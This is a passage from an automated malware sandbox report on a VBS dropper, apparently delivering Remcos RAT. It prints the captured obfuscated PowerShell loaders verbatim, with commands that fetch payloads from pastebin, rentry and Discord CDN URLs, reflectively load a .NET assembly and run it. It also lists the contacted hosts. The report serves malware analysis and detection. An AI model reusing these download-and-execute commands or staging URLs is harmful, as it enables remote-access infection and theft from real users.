'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?sg?2?hu?ugbq?fo?cgb2?cc?i??7?cq?zg?g?d0?i??o?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?ck?i??7?ek?bgb2?g8?awbl?c0?vwbl?gi?ugbl?he?dqbl?hm?d??g?c0?vqbs?ek?i??k?em?qwbs?gg?bq?g?c0?twb1?hq?rgbp?gw?zq?g?cq?zg?g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?c?bv?hc?zqby?hm?a?bl?gw?b??u?gu?e?bl?c??lqbj?g8?bqbt?ge?bgbk?c??ew?k?gy?i??9?c??k?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?sqbu?hy?bwbr?gu?lqbx?gu?ygbs?gu?cqb1?gu?cwb0?c??lqbv?fi?sq?g?cq?uqbq?hq?yqb2?c??lqbp?hu?d?bg?gk?b?bl?c??j?bm?c??lqbv?hm?zqbc?ge?cwbp?gm?u?bh?hi?cwbp?g4?zwb9?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?j?bo?hy?zqb3?g0?i??9?c??jw?w?cc?i??7?cq?zwby?hg?cwb0?c??pq?g?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?c??owbb?ei?eqb0?gu?wwbd?f0?i??k?gc?ywbi?gg?a??g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?fe?u?b0?ge?dg?u?hi?zqbw?gw?yqbj?gu?k??n?cq?j??n?cw?jwbb?cc?kq?g?ck?i??7?fs?uwb5?hm?d?bl?g0?lgbb?h??c?be?g8?bqbh?gk?bgbd?do?ogbd?hu?cgby?gu?bgb0?eq?bwbt?ge?aqbu?c4?t?bv?ge?z??o?cq?zwbj?gi?a?bo?ck?lgbh?gu?d?bu?hk?c?bl?cg?jwbu?gu?a?b1?gw?ywbo?gu?cwby?hg?w?b4?hg?lgbd?gw?yqbz?hm?mq?n?ck?lgbh?gu?d?bn?gu?d?bo?g8?z??o?cc?tqbz?he?qgbj?gi?wq?n?ck?lgbj?g4?dgbv?gs?zq?o?cq?bgb1?gw?b??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?jw?m?dq?mgbk?gi?ygbk?gu?ygbl?du?nwbj?gi?nwbk?gq?yqbk?dq?zq?4?gi?o??x?dg?zq?1?dc?yqbj?dk?oq?5?dg?oqbm?gm?mgbi?dk?yg?2?dm?oq?x?ge?nq?1?gi?m?bi?di?z?bm?gq?zq?4?gu?z?bk?gq?nqbl?de?pqbt?gg?jgbh?gu?m??z?di?mg?3?dy?pqbz?gk?jgbh?dy?mg?4?dm?mg?3?dy?pqb4?gu?pwb0?hg?d??u?di?zqb0?hm?zq?v?dm?mq?x?dc?m??4?dy?n??0?di?mg?x?d??ng?z?dk?oq?y?de?lw?x?di?nw?4?du?o??3?di?nq?4?dk?m??x?dg?mw?3?dg?mq?x?c8?cwb0?g4?zqbt?gg?ywbh?hq?d?bh?c8?bqbv?gm?lgbw?h??yqbk?hi?bwbj?hm?aqbk?c4?bgbk?gm?lw?v?do?cwbw?hq?d?bo?cc?i??s?c??j?bn?hi?e?bz?hq?i??s?c??jwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?gg?dgbl?hc?bq?s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?ds?';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.r Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'https://pastebin.com/raw/j6urjzrv' ;$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;invoke-webrequest -uri $ccrhm -outfile $f -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;$qptav = ( get-content -path $f ) ;invoke-webrequest -uri $qptav -outfile $f -usebasicparsing} ;$qptav = ( get-content -path $f ) ;$hvewm = '0' ;$grxst = 'c:\users\user\desktop\segura.vbs' ;[byte[]] $gcbhh = [system.convert]::frombase64string( $qptav.replace('$$','a') ) ;[system.appdomain]::currentdomain.load($gcbhh).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'roda' ));" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand jabmacaapqagacgawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accakqagadsajabrafaadabhahyaiaa9acaakaagaecazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacqazgagackaiaa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbsaekaiaakafeauab0ageadgagac0atwb1ahqargbpagwazqagacqazgagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagca -inputformat xml -outputformat text Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545854 Sample: segura.vbs Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 30 pastebin.com 2->30 32 cdn.discordapp.com 2->32 34 rentry.org 2->34 46 Suricata IDS alerts for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Yara detected UAC Bypass using CMSTP 2->50 54 14 other signatures 2->54 9 wscript.exe 1 2->9         started        signatures3 52 Connects to a pastebin service (likely for C&C) 30->52 process4 signatures5 56 Suspicious powershell command line found 9->56 58 Wscript starts Powershell (via cmd or directly) 9->58 60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->60 62 Suspicious execution chain found 9->62 12 powershell.exe 7 9->12         started        process6 signatures7 64 Suspicious powershell command line found 12->64 66 Encrypted powershell cmdline option found 12->66 68 Uses ping.exe to check the status of other devices and networks 12->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 12->70 15 powershell.exe 14 17 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 40 pastebin.com 104.20.3.235, 443, 49709, 49738 CLOUDFLARENETUS United States 15->40 42 cdn.discordapp.com 162.159.135.233, 443, 49756 CLOUDFLARENETUS United States 15->42 44 Encrypted powershell cmdline option found 15->44 21 PING.EXE 1 15->21         started        24 powershell.exe 15 15->24         started        26 cmd.exe 1 15->26         started        28 5 other processes 15->28 signatures10 process11 dnsIp12 36 127.0.0.1 unknown unknown 21->36 38 rentry.org 164.132.58.105, 443, 49712, 49744 OVHFR France 24->38
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.20.3.235
 pastebin.com United States
13335 CLOUDFLARENETUS true
164.132.58.105
 rentry.org France
16276 OVHFR false
162.159.135.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
rentry.org 164.132.58.105 true
cdn.discordapp.com 162.159.135.233 true
pastebin.com 104.20.3.235 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://rentry.org/vsm4ofxs/raw false
    		unknown
    https://pastebin.com/raw/J6uRjZrv true
      		unknown
      https://cdn.discordapp.com/attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a&is=672230ea&hm=1e5ddde8edfd2b0b55a1936b9b2cf98999ca75e818b8e4dadd7bc75ebedbbd24& true
        		unknown
        https://rentry.org/shqm6g9p/raw false
          		unknown
          https://pastebin.com/raw/4B83LcVU false
            		unknown